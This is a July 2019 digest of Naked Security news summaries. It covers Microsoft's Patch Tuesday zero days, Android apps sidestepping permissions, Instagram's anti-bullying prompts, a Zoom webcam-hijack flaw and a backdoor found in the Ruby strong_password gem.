July 10, 2019
Two zero days and 15 critical flaws fixed in July’s Patch Tuesday
By John E Dunn
Patch Tuesday this month offers fixes for a total of 77 vulnerabilities, of which 15 are marked critical, rounded out by two zero-day flaws just to make things interesting.
However, with an operating system estate as large as Microsoft’s these days, numbers don’t tell the whole story.
A good example of this is Microsoft’s Edge and Internet Explorer 11 browsers, which, including two overlaps, are patched for seven and six flaws respectively, all rated critical, and all remote code execution (RCE) flaws in the most vulnerable part of a browser, the web scripting engine.
It’s worth drawing attention to this because it’s easy to overlook the security of software bundled in Windows 10 which some users either use infrequently, or do not use at all.
As explained in previous coverage, this is particularly the case with IE 11, which many Windows 10 users don’t even realise is there but hangs around to maintain backwards compatibility. Compare that to Windows 10 64-bit version 1903, which earns only one critical, CVE-2019-1102.
Zero days
The two zero days are CVE-2019-0880 and CVE-2019-1132, both Elevation of Privilege (EoP) flaws currently being exploited in the wild by unnamed threat groups. The first affects the Windows splwow64 print spooler while the second is in Win32k.
Read more at https://nakedsecurity.sophos.com/2019/07/10/two-zero-days-and-15-critical-flaws-fixed-in-julys-patch-tuesday/
Rogue Android apps ignore your permissions
By Danny Bradbury
You know those Android dialogue boxes that pop up when you first run an app, asking you what permissions you want to give the software? They’re not as useful as we all thought.
New research has revealed that apps are snooping on data including location and the phone’s unique ID number – even when users haven’t given permission.
The research comes from researchers at the University of Calgary, U.C Berkeley. the IMDEA Networks Institute, the International Computer Science Institute (ICSI) and AppCensus, which offers a searchable database detailing the privacy issues with individual apps. Called 50 Ways to Leak Your Data: An Exploration of Apps’ Circumvention of the Android Permissions System, the paper spotted dozens of apps circumventing permissions-based protections in Android to get the data they want.
Android apps must ask for permission to access sensitive resources on the phone, like the GPS, the camera, or the user’s contacts data. When you say that an app can’t access your location data, the operating system can prevent it from doing so because it runs the app in its own sandbox. That also stops the app in question interacting with other apps.
Sidestepping permissions
The researchers analysed over 88,000 Android apps to see what data they transmitted from the phone, and where they sent it. They ran the test on a variety of Android systems, with the most recent being Android Pie (2018). They matched this against the permissions that the user had granted the app to see if apps were harvesting data that they shouldn’t be. They found dozens of apps transmitting data they shouldn’t have accessed, along with thousands more containing the code to do so. They reverse engineered the code and found two main methods for circumventing permissions protections.
Read more at https://nakedsecurity.sophos.com/2019/07/10/android-apps-sidestepping-permissions-to-access-sensitive-data/
Instagram asks bullies, ‘Are you sure you want to say that?’
By Lisa Vaas
Instagram on Monday announced that it’s now using artificial intelligence (AI) to detect speech that looks like bullying and that it will interrupt users before they post, asking if they might want to stop and think about it first.
The Facebook-owned platform, hugely popular with teens, also plans to soon test a new feature called “Restrict” that will enable users to hide comments from specific users without letting them know that they’ve been muted.
In the blog post, Instagram chief executive Adam Mosseri said the company “could do more” to stop bullying and help out its victims:
We can do more to prevent bullying from happening on Instagram, and we can do more to empower the targets of bullying to stand up for themselves.
These tools are grounded in a deep understanding of how people bully each other and how they respond to bullying on Instagram, but they’re only two steps on a longer path.
Think before you post
Instagram posted one example of what would-be bullies are going to see if its AI interprets their comments as offensive: a user who types “you are so ugly and stupid” gets interrupted with a notice saying: “Are you sure you want to post this? Learn more”.
If the user taps “learn more”, they get this notice: “We are asking people to rethink comments that seem similar to others that have been reported.”
Read more at https://nakedsecurity.sophos.com/2019/07/10/instagram-asks-bullies-are-you-sure-you-want-to-say-that/
Zoom flaw could force you into a meeting, expose your video feed
By Lisa Vaas
Zoom, a company that sells video conferencing software for the business market, is tweaking the app to fix a vulnerability in its software that allows malicious websites to force users into a Zoom call with the webcam turned on.
The flaw was discovered by security researcher Jonathan Leitschuh, who documented it in a blog post on Monday.
He said that initially, the vulnerability would have also allowed any webpage to inflict a denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an invalid call. But that DoS vulnerability – CVE-2019-13449 – was fixed in version 4.4.2 of the macOS client.
In discussions with the Zoom team over the past few weeks, Leitschuh said that Zoom had proposed a fix to the hijacking vulnerability: namely, digitally signing requests from websites that are made to the client.
But the researcher said that wouldn’t have solved the problem, given that an attacker would be able to set up a server to make requests to the Zoom site in order to acquire a valid digital signature before contacting the client.
Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]
Read more at https://nakedsecurity.sophos.com/2019/07/09/zoom-flaw-could-force-mac-users-into-meetings-expose-video-feed/
Backdoor discovered in Ruby strong_password library
By John E Dunn
An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.
A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7.
The discovery came about after Epion Health developer, Tute Costa, noticed something unusual when carefully updating a family of libraries used by his company’s dev to fix bugs and security vulnerabilities.
When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.
The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:
Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.
The backdoor would download code from the Pastebin address for production sites, giving the attackers the power of remote code execution, silently hijacking any websites unfortunate to have updated to the rogue strong_password gem.
Read more at https://nakedsecurity.sophos.com/2019/07/09/backdoor-discovered-in-ruby-strong_password-library/